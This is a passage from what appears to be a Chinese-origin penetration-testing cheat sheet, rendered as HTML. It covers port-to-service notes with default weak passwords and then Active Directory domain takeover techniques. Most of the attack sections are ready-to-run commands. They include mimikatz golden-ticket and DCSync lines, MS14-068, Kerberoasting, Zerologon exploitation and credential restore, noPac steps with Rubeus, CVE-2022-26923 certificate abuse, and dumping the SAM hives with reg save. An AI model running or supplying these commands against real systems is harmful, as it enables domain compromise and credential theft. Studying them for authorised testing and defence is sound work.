style="color: #babed8">3389 Remote Desktop</span></span></code></pre></div><h5 id="5、端口合计所对应的服务"><a href="#5、端口合计所对应的服务" class="headerlink" title="5、Full list of ports and their services"></a>5、Full list of ports and their services</h5><div class="language-txt"><button title="Copy code" 
class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">21 ftp</span></span><span class="line"><span style="color: #babed8">22 SSH</span></span><span class="line"><span style="color: #babed8">23 Telnet</span></span><span class="line"><span style="color: #babed8">25 SMTP</span></span><span class="line"><span style="color: #babed8">53 DNS</span></span><span class="line"><span style="color: #babed8">69 TFTP</span></span><span class="line"><span style="color: #babed8">80 web</span></span><span class="line"><span style="color: #babed8">80-89 web</span></span><span class="line"><span style="color: #babed8">110 POP3</span></span><span class="line"><span style="color: #babed8">135 RPC</span></span><span class="line"><span style="color: #babed8">139 NETBIOS</span></span><span class="line"><span style="color: #babed8">143 IMAP</span></span><span class="line"><span style="color: #babed8">161 SNMP</span></span><span class="line"><span style="color: #babed8">389 LDAP</span></span><span class="line"><span style="color: #babed8">443 SSL Heartbleed and various web vulnerability tests</span></span><span class="line"><span style="color: #babed8">445 SMB</span></span><span class="line"><span style="color: #babed8">512,513,514 Rexec</span></span><span class="line"><span style="color: #babed8">873 Rsync unauthenticated access</span></span><span class="line"><span style="color: #babed8">1025,111 NFS</span></span><span class="line"><span style="color: #babed8">1080 socks</span></span><span class="line"><span style="color: #babed8">1158 ORACLE EMCTL</span></span><span class="line"><span style="color: #babed8">1433 MSSQL (brute force)</span></span><span class="line"><span style="color: #babed8">1521 Oracle:(iSqlPlus Port:5560,7778)</span></span><span class="line"><span style="color: #babed8">2082/2083 cpanel hosting control panel login (mostly used outside China)</span></span><span 
class="line"><span style="color: #babed8">2222 DA (DirectAdmin) virtual hosting control panel login (mostly used overseas) </span></span><span class="line"><span style="color: #babed8">2601,2604 zebra routing, default password zebra </span></span><span class="line"><span style="color: #babed8">3128 squid proxy default port; if no password is set it very likely gives direct access to the internal network </span></span><span class="line"><span style="color: #babed8">3306 MySQL (brute force) </span></span><span class="line"><span style="color: #babed8">3312/3311 kangle hosting control panel login </span></span><span class="line"><span style="color: #babed8">3389 Remote Desktop </span></span><span class="line"><span style="color: #babed8">3690 svn </span></span><span class="line"><span style="color: #babed8">4440 rundeck see WooYun: a Sina service used to roam Sina's internal network </span></span><span class="line"><span style="color: #babed8">4848 GlassFish web middleware, weak password: admin/adminadmin </span></span><span class="line"><span style="color: #babed8">5432 PostgreSQL </span></span><span class="line"><span style="color: #babed8">5900 vnc </span></span><span class="line"><span style="color: #babed8">5984 CouchDB http://xxx:5984/_utils/ </span></span><span class="line"><span style="color: #babed8">6082 varnish see WooYun: unauthenticated access to the Varnish HTTP accelerator CLI easily lets the site be tampered with directly or be used as a proxy into the internal network </span></span><span class="line"><span style="color: #babed8">6379 redis unauthenticated access </span></span><span class="line"><span style="color: #babed8">7001,7002 WebLogic default weak passwords, deserialization </span></span><span class="line"><span style="color: #babed8">7778 Kloxo hosting control panel login </span></span><span class="line"><span style="color: #babed8">8000-9090 common web ports; some ops teams like to put admin backends on these non-80 ports </span></span><span class="line"><span style="color: #babed8">8080 tomcat/WDCP hosting control panel, default weak passwords </span></span><span class="line"><span style="color: #babed8">8080,8089,9090 JBOSS </span></span><span class="line"><span style="color: #babed8">8081 Symantec AV/Filter for MSE </span></span><span class="line"><span style="color: #babed8">8083 VestaCP hosting control panel (mostly used overseas) </span></span><span class="line"><span style="color: #babed8">8649 ganglia </span></span><span class="line"><span 
style="color: #babed8">8888 amh/LuManager hosting control panel default port </span></span><span class="line"><span style="color: #babed8">9000 fcgi (FastCGI) php execution </span></span><span class="line"><span style="color: #babed8">9043 websphere [web middleware] weak passwords: admin/admin websphere/websphere system/manager </span></span><span class="line"><span style="color: #babed8">9200,9300 elasticsearch see WooYun: ElasticSearch command execution vulnerability on a Duowan server </span></span><span class="line"><span style="color: #babed8">10000 Virtualmin/Webmin server virtual hosting control panel </span></span><span class="line"><span style="color: #babed8">11211 memcache unauthenticated access </span></span><span class="line"><span style="color: #babed8">27017,27018 Mongodb unauthenticated access </span></span><span class="line"><span style="color: #babed8">28017 mongodb statistics page </span></span><span class="line"><span style="color: #babed8">50000 SAP command execution </span></span><span class="line"><span style="color: #babed8">50060 hadoop </span></span><span class="line"><span style="color: #babed8">50070,50030 hadoop default ports, unauthenticated access</span></span></code></pre></div><h3 id="域渗透"><a href="#域渗透" class="headerlink" title="域渗透"></a>Domain Penetration</h3><h4 id="信息搜集-1"><a href="#信息搜集-1" class="headerlink" title="信息搜集"></a>Information Gathering</h4><h5 id="powerview-ps1"><a href="#powerview-ps1" class="headerlink" title="powerview.ps1"></a>powerview.ps1</h5><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">Get-NetDomain - gets the name of the current user's domain</span></span><span class="line"><span style="color: #babed8">Get-NetForest - gets the forest associated with the current user's domain</span></span><span class="line"><span style="color: #babed8">Get-NetForestDomains - gets all domains for the current forest</span></span><span class="line"><span style="color: #babed8">Get-NetDomainControllers - gets the domain controllers for the current computer's 
domain</span></span><span class="line"><span style="color: #babed8">Get-NetCurrentUser - gets the current [domain\]username</span></span><span class="line"><span style="color: #babed8">Get-NetUser - returns all user objects, or the user specified (wildcard specifiable)</span></span><span class="line"><span style="color: #babed8">Get-NetUserSPNs - gets all user ServicePrincipalNames</span></span><span class="line"><span style="color: #babed8">Get-NetOUs - gets data for domain organization units</span></span><span class="line"><span style="color: #babed8">Get-NetGUIDOUs - finds domain OUs linked to a specific GUID</span></span><span class="line"><span style="color: #babed8">Invoke-NetUserAdd - adds a local or domain user</span></span><span class="line"><span style="color: #babed8">Get-NetGroups - gets a list of all current groups in the domain</span></span><span class="line"><span style="color: #babed8">Get-NetGroup - gets data for each user in a specified domain group</span></span><span class="line"><span style="color: #babed8">Get-NetLocalGroups - gets a list of localgroups on a remote host or hosts</span></span><span class="line"><span style="color: #babed8">Get-NetLocalGroup - gets the members of a localgroup on a remote host or hosts</span></span><span class="line"><span style="color: #babed8">Get-NetLocalServices - gets a list of running services/paths on a remote host or hosts</span></span><span class="line"><span style="color: #babed8">Invoke-NetGroupUserAdd - adds a user to a specified local or domain group</span></span><span class="line"><span style="color: #babed8">Get-NetComputers - gets a list of all current servers in the domain</span></span><span class="line"><span style="color: #babed8">Get-NetFileServers - get a list of file servers used by current domain users</span></span><span class="line"><span style="color: #babed8">Get-NetShare - gets share information for a specified server</span></span><span class="line"><span style="color: 
#babed8">Get-NetLoggedon - gets users actively logged onto a specified server</span></span><span class="line"><span style="color: #babed8">Get-NetSessions - gets active sessions on a specified server</span></span><span class="line"><span style="color: #babed8">Get-NetFileSessions - returns combined Get-NetSessions and Get-NetFiles</span></span><span class="line"><span style="color: #babed8">Get-NetConnections - gets active connections to a specific server resource (share)</span></span><span class="line"><span style="color: #babed8">Get-NetFiles - gets open files on a server</span></span><span class="line"><span style="color: #babed8">Get-NetProcesses - gets the remote processes and owners on a remote server</span></span></code></pre></div><p>PowerView-2.0-tricks:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">https://gist.github.com/HarmJ0y/3328d954607d71362e3c</span></span></code></pre></div><p>PowerView-3.0-tricks:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993</span></span></code></pre></div><h5 id="BloodHound"><a href="#BloodHound" class="headerlink" title="BloodHound"></a>BloodHound</h5><p><strong>Get information on all computers under a given OU</strong></p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">{</span></span><span class="line"><span style="color: #babed8"> "name": "Find the specified OU computers",</span></span><span 
class="line"><span style="color: #babed8"> "queryList": [</span></span><span class="line"><span style="color: #babed8"> {</span></span><span class="line"><span style="color: #babed8"> "final": false,</span></span><span class="line"><span style="color: #babed8"> "title": "Select an OU...",</span></span><span class="line"><span style="color: #babed8"> "query": "MATCH (n:OU) RETURN distinct n.name ORDER BY n.name DESC"</span></span><span class="line"><span style="color: #babed8"> },</span></span><span class="line"><span style="color: #babed8"> {</span></span><span class="line"><span style="color: #babed8"> "final": true,</span></span><span class="line"><span style="color: #babed8"> "query": "MATCH (m:OU {name: $result}) with m MATCH p=(o:OU {objectid: m.objectid})-[r:Contains*1..]->(n:Computer) RETURN p",</span></span><span class="line"><span style="color: #babed8"> "allowCollapse": true,</span></span><span class="line"><span style="color: #babed8"> "endNode": "{}"</span></span><span class="line"><span style="color: #babed8"> }</span></span><span class="line"><span style="color: #babed8"> ]</span></span><span class="line"><span style="color: #babed8"> }</span></span></code></pre></div><p><strong>Automatically mark owned users and machines</strong></p><p><a href="https://github.com/Lz1y/SyncDog">SyncDog</a></p><h5 id="获取域内DNS信息"><a href="#获取域内DNS信息" class="headerlink" title="获取域内DNS信息"></a>Getting DNS Records in the Domain</h5><ul><li><a href="https://github.com/dirkjanm/adidnsdump">adidnsdump</a></li><li><a href="https://3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-DNS%E8%AE%B0%E5%BD%95%E7%9A%84%E8%8E%B7%E5%8F%96">Domain Penetration: Obtaining DNS Records</a><br></li></ul><h4 id="获取域控的方法"><a href="#获取域控的方法" class="headerlink" title="获取域控的方法"></a>Methods of Getting the Domain Controller</h4><h5 id="SYSVOL"><a href="#SYSVOL" class="headerlink" title="SYSVOL"></a>SYSVOL</h5><p>SYSVOL is the shared folder that stores the server copy of the domain's public files; it is replicated between all domain controllers in the domain. The Sysvol folder is created when AD is installed and is used to hold GPOs, scripts and similar data. Anything stored in the Sysvol folder is replicated to every DC in the domain.<br>Related reading: </p><ul><li><a 
href="https://www.secpulse.com/archives/42175.html">Finding passwords in SYSVOL and attacking GPP (Group Policy Preferences) </a></li><li><a href="http://blog.51cto.com/ycrsjxy/203095">Windows Server 2008 R2, part 4: managing the Sysvol folder </a></li><li><a href="https://adsecurity.org/?p=2288">Finding passwords in SYSVOL and exploiting Group Policy Preferences </a></li><li><a href="https://xz.aliyun.com/t/1653">Recovering passwords saved in Group Policy from SYSVOL</a></li></ul><h5 id="MS14-068-Kerberos"><a href="#MS14-068-Kerberos" class="headerlink" title="MS14-068 Kerberos"></a>MS14-068 Kerberos</h5><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">python ms14-068.py -u 域用户@域名 -p 密码 -s 用户SID -d 域主机</span></span></code></pre></div><p>Use mimikatz to load the TGT_domainuser@SERVER.COM.ccache produced by the tool into memory and create the cached ticket:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">mimikatz.exe "kerberos::ptc c:\TGT_darthsidious@pentest.com.ccache" exit</span></span><span class="line"><span style="color: #babed8">net use k: \\pentest.com\c$</span></span></code></pre></div><p>Related reading:</p><ul><li><a href="http://adsecurity.org/?p=676">PyKEK Kerberos toolkit</a> </li><li><a href="http://www.freebuf.com/vuls/56081.html">An in-depth look at the MS14-068 vulnerability</a></li><li><a href="https://adsecurity.org/?p=541">Kerberos security vulnerabilities</a></li></ul><h5 id="SPN扫描"><a href="#SPN扫描" class="headerlink" title="SPN扫描"></a>SPN Scanning</h5><p>Kerberoast can be an effective way to extract service account credentials from Active Directory as an ordinary domain user, without sending any packets to the target system.<br>An SPN is the unique identifier of a service on a network that uses Kerberos authentication. It consists of a service class, a host name and a port. On a network using Kerberos authentication, an SPN must be registered for the server under either a built-in computer account (such as NetworkService or LocalSystem) or a user account. For built-in accounts the SPN is registered automatically; if the service runs under a domain user account, however, the SPN must be registered manually for the account that will be used.<br>The main benefit of SPN scanning is that it does not need to connect to every IP on the network to check service ports: service discovery is done through LDAP queries to the domain controller, and SPN queries are part of normal Kerberos ticket behaviour, so SPN scanning is hard to detect.<br>Related reading:</p><ul><li><a href="https://blog.netspi.com/locate-and-attack-domain-sql-servers-without-scanning/">Locating domain SQL Servers without scanning</a> </li><li><a href="https://adsecurity.org/?p=1508">SPN scanning</a> </li><li><a href="https://github.com/PyroTek3/PowerShell-AD-Recon">Scripts for scanning SQL Server</a></li></ul><h5 id="Kerberos的黄金门票"><a href="#Kerberos的黄金门票" class="headerlink" title="Kerberos的黄金门票"></a>Kerberos Golden Ticket</h5><p>Hash obtained from the domain</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">lsadump::dcsync /domain:pentest.com /user:krbtgt</span></span></code></pre></div><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">kerberos::purge</span></span><span class="line"><span style="color: #babed8">kerberos::golden /admin:administrator /domain:域 /sid:SID /krbtgt:hash值 /ticket:administrator.kirbi</span></span><span class="line"><span style="color: #babed8">kerberos::ptt administrator.kirbi</span></span><span class="line"><span style="color: #babed8">kerberos::tgt</span></span><span class="line"><span style="color: #babed8">net use k: \\pentest.com\c$</span></span></code></pre></div><p>Related reading:</p><ul><li><a href="https://adsecurity.org/?p=1640">https://adsecurity.org/?p=1640</a> </li><li><a href="http://bobao.360.cn/learning/detail/3564.html">Cracking domain service accounts in practice</a> </li><li><a 
href="https://blog.csdn.net/wulantian/article/details/42418231">How Kerberos authentication works</a> </li><li><a href="https://klionsec.github.io/2016/08/10/ntlm-kerberos/">A deep understanding of Windows authentication: NTLM &amp; Kerberos</a></li></ul><h5 id="Kerberos的银票务"><a href="#Kerberos的银票务" class="headerlink" title="Kerberos的银票务"></a>Kerberos Silver Ticket</h5><p>Some differences between golden tickets and silver tickets:<br>Golden Ticket: forges the <code>TGT</code>, which grants access to <code>any Kerberos</code> service<br>Silver Ticket: forges a TGS, which <code>can only access the specified service</code><br>Different encryption:<br>The Golden Ticket is encrypted with the hash of <code>krbtgt</code><br>The Silver Ticket is encrypted with the hash of the <code>service account</code> (usually a computer account)<br>Different authentication flow:<br>Using a golden ticket requires communicating with the domain controller<br>Using a silver ticket does not require communicating with the domain controller<br>Related reading:</p><ul><li><a href="https://adsecurity.org/?p=2011">How attackers use Kerberos silver tickets to exploit systems</a> </li><li><a href="https://www.feiworks.com/wy/drops/%E5%9F%9F%E6%B8%97%E9%80%8F%E2%80%94%E2%80%94Pass%20The%20Ticket.pdf">Domain Penetration: Pass The Ticket</a></li></ul><h5 id="域服务账号破解"><a href="#域服务账号破解" class="headerlink" title="域服务账号破解"></a>Cracking Domain Service Accounts</h5><p>Same principle as the SPN scanning above<br><a href="https://github.com/nidem/kerberoast">https://github.com/nidem/kerberoast</a><br>Get all accounts used as SPNs</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">setspn -T PENTEST.com -Q */*</span></span></code></pre></div><p>Extract the obtained tickets from RAM with Mimikatz</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">kerberos::list /export</span></span></code></pre></div><p>Crack with tgsrepcrack</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">tgsrepcrack.py wordlist.txt 
1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi</span></span></code></pre></div><h5 id="凭证盗窃"><a href="#凭证盗窃" class="headerlink" title="凭证盗窃"></a>Credential Theft</h5><p>Look for the administrator's password among the collected passwords </p><h5 id="NTLM-relay"><a href="#NTLM-relay" class="headerlink" title="NTLM relay"></a>NTLM relay</h5><ul><li><a href="https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/">One API call away from Domain Admin</a></li><li><a href="https://github.com/dirkjanm/privexchange/">privexchange</a></li><li><a href="https://github.com/ridter/exchange2domain">Exchange2domain</a></li></ul><p>Methods for actively making the target machine initiate an NTLM request:</p><ul><li><a href="https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py">printerbug</a></li><li><a href="https://github.com/topotam/PetitPotam">PetitPotam</a></li></ul><p>Relay LDAP:</p><ul><li><a href="https://github.com/Ridter/CVE-2019-1040-dcpwn">CVE-2019-1040-dcpwn</a></li></ul><p>Relay AD CS/PKI:</p><ul><li><a href="https://www.bussink.net/ad-cs-exploit-via-petitpotam-from-0-to-domain-domain/">AD CS/PKI template exploit</a></li></ul><p>A tool that integrates several of these techniques:</p><ul><li><a href="https://github.com/Ridter/Relayx">Relayx</a></li></ul><p>Internal port 445 forwarding:</p><ul><li><a href="https://github.com/praetorian-inc/PortBender">PortBender</a></li></ul><h5 id="Kerberos委派"><a href="#Kerberos委派" class="headerlink" title="Kerberos委派"></a>Kerberos Delegation</h5><ul><li><a href="https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html">Wagging-the-Dog.html</a></li><li><a href="https://blog.harmj0y.net/activedirectory/s4u2pwnage/">s4u2pwnage</a></li><li><a href="https://xz.aliyun.com/t/2931">Attacking Kerberos Delegation</a></li><li><a href="https://adsecurity.org/?p=4056">Using the print service to get the domain controller</a></li><li><a href="https://blog.harmj0y.net/activedirectory/a-case-study-in-wagging-the-dog-computer-takeover/">Computer Takeover</a></li><li><a href="https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/">Combining NTLM Relaying and Kerberos delegation</a></li><li><a 
href="https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/">CVE-2019-1040</a></li></ul><h5 id="地址解析协议"><a href="#地址解析协议" class="headerlink" title="地址解析协议"></a>Address Resolution Protocol</h5><p>Only fall back to ARP when nothing else works </p><h5 id="Zerologon"><a href="#Zerologon" class="headerlink" title="Zerologon"></a>Zerologon</h5><p>1. Using Mimikatz<br><strong>check</strong></p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">lsadump::zerologon /target:dc1.exploit.local /account:dc1$</span></span></code></pre></div><p><strong>exploit</strong></p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">lsadump::zerologon /target:dc1.exploit.local /account:dc1$ /exploit</span></span></code></pre></div><p><strong>dcsync</strong></p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">lsadump::dcsync /dc:dc1.exploit.local /authuser:dc1$ /authdomain:exploit.local /authpassword:"" /domain:exploit.local /authntlm /user:krbtgt</span></span></code></pre></div><p><strong>restore</strong></p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">lsadump::postzerologon /target:conttosson.locl /account:dc$ </span></span></code></pre></div><p>2. Using impacket:</p><ul><li>Get the target host name + IP</li><li>Install the modified version of impacket</li><li>Exp</li></ul><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">python cve-2020-1472-exploit.py DC2008 10.211.55.200</span></span></code></pre></div><p><img src="https://blogpics-1251691280.file.myqcloud.com/imgs/20200916190137.png"></p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">secretsdump.py -no-pass cgdomain.com/'DC2008$'@10.211.55.200 -history -just-dc-user administrator</span></span></code></pre></div><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">secretsdump.py -no-pass cgdomain.com/administrator@10.211.55.200 -hashes aad3b435b51404eeaad3b435b51404ee:3add1560657a19b3166247eb3eb149ae</span></span></code></pre></div><p><img src="https://blogpics-1251691280.file.myqcloud.com/imgs/20200916190359.png"></p><p>Once the old password's plaintext hex is obtained, restore it</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">python restorepassword.py cgdomain.com/DC2008@DC2008 -target-ip 10.211.55.200 -hexpass 
59958639cbdd4523de5d42b01adb0e256e0d39aef14c8eef31f4c078862109f253bbb7b3817ab123d013856c028fa4993f5f5b9a830a3a98d87483b29df3fb55082a1f464b19220a2c04f6605d2d321a04afbb551f8f19a13d399f9f5af2aa23c5b76b49001033516fefd90cb0348256e8282b22cbf9e70d82a8b8d2916d578246e288af3af727533d36ad8950fe1c513771377d98a947c4a8eae2b581a74b6687a2e533b7e89e8d03c2e6c2123d519489869a6e33d3a8884be33107060b62e2852502261f48c097ddb68750cc55b7688cc951441cf02989a307f55c008e978edbaf31766d17b53505016c7580cb480b</span></span></code></pre></div><p><img src="https://blogpics-1251691280.file.myqcloud.com/imgs/20200916190457.png"></p><p>Restore method 2<br>Use wmic with pass-the-hash to get local administrator (domain admin) privileges on the domain controller</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8adfc85c3490040e942ae1e6c68f645e test.local/Administrator@10.211.55.38</span></span></code></pre></div><p>Then run the following one by one to copy the SAM database from that machine to the local host</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">- reg save HKLM\SYSTEM system.save</span></span><span class="line"><span style="color: #babed8">- reg save HKLM\SAM sam.save</span></span><span class="line"><span style="color: #babed8">- reg save HKLM\SECURITY security.save</span></span><span class="line"><span style="color: #babed8">- get system.save</span></span><span class="line"><span style="color: #babed8">- get sam.save</span></span><span class="line"><span style="color: #babed8">- get security.save</span></span><span class="line"><span style="color: #babed8">- del /f system.save</span></span><span class="line"><span style="color: #babed8">- del /f sam.save</span></span><span class="line"><span 
style="color: #babed8">- del /f security.save</span></span></code></pre></div><p>Extract the hashes</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">secretsdump.py -sam sam.save -system system.save -security security.save LOCAL</span></span></code></pre></div><p>Then restore.<br> </p><h5 id="noPac"><a href="#noPac" class="headerlink" title="noPac"></a>noPac</h5><p>Vulnerability analysis: <a href="https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html">CVE-2021-42287/CVE-2021-42278 Weaponisation</a></p><p>Exploit:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8"># Create Machine Account</span></span><span class="line"><span style="color: #babed8">New-MachineAccount -MachineAccount TestSPN -Domain internal.zeroday.lab -DomainController idc1.internal.zeroday.lab -Verbose</span></span><span class="line"><span style="color: #babed8"></span></span><span class="line"><span style="color: #babed8"># Clear SPNs</span></span><span class="line"><span style="color: #babed8">Set-DomainObject "CN=TestSPN,CN=Computers,DC=internal,DC=zeroday,DC=lab" -Clear 'serviceprincipalname' -Verbose</span></span><span class="line"><span style="color: #babed8"></span></span><span class="line"><span style="color: #babed8"># Change Machine Account samaccountname</span></span><span class="line"><span style="color: #babed8">Set-MachineAccountAttribute -MachineAccount TestSPN -Value "IDC1" -Attribute samaccountname -Verbose</span></span><span class="line"><span style="color: #babed8"></span></span><span class="line"><span style="color: #babed8"># Request TGT</span></span><span class="line"><span style="color: 
#babed8">.\Rubeus.exe asktgt /user:IDC1 /password:Password1 /domain:internal.zeroday.lab /dc:idc1.internal.zeroday.lab /nowrap</span></span><span class="line"><span style="color: #babed8"></span></span><span class="line"><span style="color: #babed8"># Change Machine Account samaccountname</span></span><span class="line"><span style="color: #babed8">Set-MachineAccountAttribute -MachineAccount TestSPN -Value "TestSPN" -Attribute samaccountname -Verbose</span></span><span class="line"><span style="color: #babed8"></span></span><span class="line"><span style="color: #babed8"># Request S4U2self</span></span><span class="line"><span style="color: #babed8">.\Rubeus.exe s4u /impersonateuser:Administrator /nowrap /dc:idc1.internal.zeroday.lab /self /altservice:LDAP/IDC1.internal.zeroday.lab /ptt /ticket:[TGT]</span></span><span class="line"><span style="color: #babed8"></span></span></code></pre></div><p>One-click exploitation: <a href="https://github.com/cube0x0/noPac">noPac</a></p><h5 id="ADCS"><a href="#ADCS" class="headerlink" title="ADCS"></a>ADCS</h5><p>Domain privilege escalation through misconfigured templates in ADCS; for details see: <a href="https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf">Certified_Pre-Owned</a></p><p>Usable tools:</p><ul><li><a href="https://github.com/GhostPack/Certify">Certify</a></li><li><a href="https://github.com/ly4k/Certipy">Certipy</a></li><li><a href="https://github.com/dirkjanm/PKINITtools">PKINITtools</a></li><li><a href="https://github.com/eloypgz/certi">certi</a></li></ul><h5 id="CVE-2022-26923"><a href="#CVE-2022-26923" class="headerlink" title="CVE-2022-26923"></a>CVE-2022-26923</h5><p>Prerequisite: ADCS is present in the domain<br>Exploit:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8"># Change the DNS hostname of the controlled machine account</span></span><span class="line"><span style="color: #babed8">python certi.py account create 
cgdomain.com/sanfeng:'1qazXSW@'@10.211.55.200 -dc-ip 10.211.55.200 -user testvul -dns dc2008.cgdomain.com</span></span><span class="line"><span style="color: #babed8"></span></span><span class="line"><span style="color: #babed8"># Request a certificate</span></span><span class="line"><span style="color: #babed8">python certi.py req 'cgdomain.com/testvul$:NUxhMemzaP4rsPnu'@10.211.55.200 -dc-ip 10.211.55.200 -ca cgdomain-DC2008-CA -template 'Machine'</span></span><span class="line"><span style="color: #babed8"></span></span><span class="line"><span style="color: #babed8"># Get the DC hash</span></span><span class="line"><span style="color: #babed8">python certi.py auth -dc-ip 10.211.55.200 -pfx dc2008.pfx -username dc2008$</span></span><span class="line"><span style="color: #babed8"></span></span><span class="line"><span style="color: #babed8"># Restore the machine account's DNS hostname</span></span><span class="line"><span style="color: #babed8">python certi.py account update cgdomain.com/sanfeng:'1qazXSW@'@10.211.55.200 -dc-ip 10.211.55.200 -user testvul -dns testvul.hqcec.com</span></span></code></pre></div><blockquote><p>Note: in this environment the ADCS and the DC are the same machine. In a real environment the parameters must be adjusted to the actual situation.</p></blockquote><h4 id="获取AD哈希"><a href="#获取AD哈希" class="headerlink" title="获取AD哈希"></a>Getting AD Hashes</h4><ul><li>Use VSS volume shadow copies </li><li>Get the NTDS.DIT file with Ntdsutil </li><li>Extract NTDS.DIT in PowerShell –><a href="https://github.com/clymb3r/PowerShell/tree/master/Invoke-NinjaCopy">Invoke-NinjaCopy </a></li><li>Extract with Mimikatz</li></ul><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">mimikatz lsadump::lsa /inject exit </span></span></code></pre></div><ul><li>Use PowerShell Mimikatz</li><li>Use Mimikatz DCSync to dump Active Directory credentials remotely<br>Extract the password data of the KRBTGT user account:</li></ul><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">Mimikatz "privilege::debug" "lsadump::dcsync /domain:rd.adsecurity.org /user:krbtgt" exit</span></span></code></pre></div><p>Extract the password data of the Administrator user account:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki 
